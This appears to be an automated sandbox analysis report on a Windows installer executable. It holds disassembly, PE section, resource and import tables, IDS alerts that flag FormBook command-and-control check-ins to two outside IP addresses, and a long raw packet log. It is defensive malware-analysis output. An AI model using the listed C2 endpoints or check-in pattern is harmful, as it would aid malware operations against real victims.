                                                                                                                                                                                                                        push esi
                                                                                                                                                                                                                        call 00007F3D846E2DF6h
                                                                                                                                                                                                                        push esi
                                                                                                                                                                                                                        call dword ptr [0040815Ch]
                                                                                                                                                                                                                        lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                                                                                        cmp byte ptr [esi], 00000000h
                                                                                                                                                                                                                        jne 00007F3D846DFCFCh
                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                        push 00000009h
                                                                                                                                                                                                                        call 00007F3D846E2E4Eh
                                                                                                                                                                                                                        push 00000007h
                                                                                                                                                                                                                        call 00007F3D846E2E47h
                                                                                                                                                                                                                        mov dword ptr [0042A244h], eax
                                                                                                                                                                                                                        call dword ptr [0040803Ch]
                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                        call dword ptr [004082A4h]
                                                                                                                                                                                                                        mov dword ptr [0042A2F8h], eax
                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                        lea eax, dword ptr [esp+34h]
                                                                                                                                                                                                                        push 000002B4h
                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                        push 004216E8h
                                                                                                                                                                                                                        call dword ptr [00408188h]
                                                                                                                                                                                                                        push 0040A384h
                                                                                                                                                                                                                        push 00429240h
                                                                                                                                                                                                                        call 00007F3D846E2A30h
                                                                                                                                                                                                                        call dword ptr [004080ACh]
                                                                                                                                                                                                                        mov ebp, 00435000h
                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                        call 00007F3D846E2A1Eh
                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                        call dword ptr [00408174h]
                                                                                                                                                                                                                        add word ptr [eax], 0000h
                                                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                                                        • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4f000 | 0x24bf8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b4 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x615d | 0x6200 | 0b0812166ebbd0109e7f5e007b182949 | False | 0.6616709183673469 | data | 6.450231726170125 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x13a4 | 0x1400 | 4ac891d4ddf58633f14436f9f80ac6b6 | False | 0.4529296875 | data | 5.163001655755973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x20338 | 0x600 | 66b45fceba0f24d768fb09e0afe23c99 | False | 0.5026041666666666 | data | 3.9824009583068882 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2b000 | 0x24000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x4f000 | 0x24bf8 | 0x24c00 | d03da8dabf58037657a90c0af0ddc01a | False | 0.910601349914966 | data | 7.7757226718352515 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_BITMAP | 0x4f4c0 | 0x368 | Device independent bitmap graphic, 96 x 16 x 4, image size 768 | English | United States | 0.23623853211009174
RT_ICON | 0x4f828 | 0x132a8 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9996305920717415
RT_ICON | 0x62ad0 | 0x7a37 | PNG image data, 256 x 256, 8-bit colormap, non-interlaced | English | United States | 0.9927765525617669
RT_ICON | 0x6a508 | 0x2967 | PNG image data, 256 x 256, 4-bit colormap, non-interlaced | English | United States | 0.9979243324841967
RT_ICON | 0x6ce70 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5449170124481327
RT_ICON | 0x6f418 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.6078799249530957
RT_ICON | 0x704c0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304 | English | United States | 0.6735074626865671
RT_ICON | 0x71368 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024 | English | United States | 0.7842960288808665
RT_ICON | 0x71c10 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.47621951219512193
RT_ICON | 0x72278 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256 | English | United States | 0.7059248554913294
RT_ICON | 0x727e0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.7180851063829787
RT_ICON | 0x72c48 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.5752688172043011
RT_ICON | 0x72f30 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.7601351351351351
RT_DIALOG | 0x73058 | 0x144 | data | English | United States | 0.5216049382716049
RT_DIALOG | 0x731a0 | 0x13c | data | English | United States | 0.5506329113924051
RT_DIALOG | 0x732e0 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x733e0 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x73500 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x735c8 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x73628 | 0xae | data | English | United States | 0.6091954022988506
RT_VERSION | 0x736d8 | 0x1dc | data | English | United States | 0.5462184873949579
RT_MANIFEST | 0x738b8 | 0x33d | XML 1.0 document, ASCII text, with very long lines (829), with no line terminators | English | United States | 0.5536791314837153
DLL | Import
KERNEL32.dll | SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, CreateFileW, GetFileSize, MoveFileW, SetFileAttributesW, GetModuleFileNameW, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, WaitForSingleObject, GetCurrentProcess, CompareFileTime, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GetDiskFreeSpaceW, lstrlenW, lstrcpynW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll | GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll | RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken | Map
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                                                                                                                                                                        2024-10-23T18:58:42.608482+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049874172.67.148.13380TCP
                                                                                                                                                                                                                        2024-10-23T18:58:45.272826+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049875172.67.148.13380TCP
                                                                                                                                                                                                                        2024-10-23T18:58:47.875961+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049876172.67.148.13380TCP
                                                                                                                                                                                                                        2024-10-23T18:58:50.496361+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049877172.67.148.13380TCP
                                                                                                                                                                                                                        2024-10-23T18:58:56.612400+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498783.33.130.19080TCP
                                                                                                                                                                                                                        2024-10-23T18:58:58.355482+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498793.33.130.19080TCP
                                                                                                                                                                                                                        2024-10-23T18:59:00.996705+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498803.33.130.19080TCP
                                                                                                                                                                                                                        2024-10-23T18:59:06.546231+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.20498813.33.130.19080TCP
                                                                                                                                                                                                                        2024-10-23T18:59:11.781952+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498823.33.130.19080TCP
                                                                                                                                                                                                                        2024-10-23T18:59:14.417558+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498833.33.130.19080TCP
                                                                                                                                                                                                                        2024-10-23T18:59:17.961772+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498843.33.130.19080TCP
                                                                                                                                                                                                                        2024-10-23T19:00:19.713956+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.20498853.33.130.19080TCP
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.894959927 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.895011902 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.895430088 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.901623011 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.901885033 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.901940107 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.902254105 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.910528898 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.910770893 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.910825014 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.911060095 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.914160013 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.914405107 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.914459944 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.914711952 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.919466972 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.919708967 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.919763088 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.919964075 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.924410105 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.924643040 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.924691916 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.924941063 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.929244041 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.929476023 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.929526091 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.929757118 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.934484959 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.934664011 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.934710026 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.934768915 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.935004950 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.935004950 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.938898087 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.939132929 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.939184904 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.939469099 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.943840027 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.944096088 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.944149971 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.944467068 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.948360920 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.948596001 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.948646069 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.948957920 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.953180075 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.953421116 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.953474998 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.953792095 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.957885027 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.958125114 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.958177090 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.958409071 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.962831020 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.963068008 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.963123083 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.963412046 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.967394114 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.967623949 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.967674971 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.967909098 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.972296000 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.972517014 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.972568035 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.972856998 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.976843119 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.977081060 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.977132082 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.977360964 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.981599092 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.981842041 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.981897116 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.982181072 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.985790014 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.986023903 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.986076117 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.986306906 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.991424084 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.991657019 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.991708040 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.991944075 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.993990898 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.994221926 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.994272947 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.994504929 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.998115063 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.998374939 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.998425961 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.998734951 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.002489090 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.002728939 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.002783060 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.003057003 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.006165028 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.006407976 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.006460905 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.006746054 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.080295086 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.080344915 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.080574989 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.081893921 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.082127094 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.082175970 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.082470894 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.084084034 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.084317923 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.084367990 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.084602118 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.085890055 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.086103916 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.086153984 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.086344957 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.087810040 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.088006020 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.088059902 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.088279009 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.089754105 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.090019941 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.090049982 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.090399027 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.091933966 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.092195034 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.092250109 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.092565060 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.093583107 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.093823910 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.093874931 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.094185114 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.095510960 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.095750093 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.095803022 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.096030951 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.097363949 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.097564936 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.097620010 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.097853899 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.098951101 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.099205971 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.099256992 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.099589109 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.100789070 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.101027012 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.101078987 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.101313114 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.102436066 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.102674961 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.102725983 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.102984905 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.104873896 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.105118990 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.105170012 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.105460882 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.106012106 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.106247902 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.106298923 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.106537104 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.108602047 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.108838081 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.108886957 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.109119892 CEST49791443192.168.11.20142.250.176.193
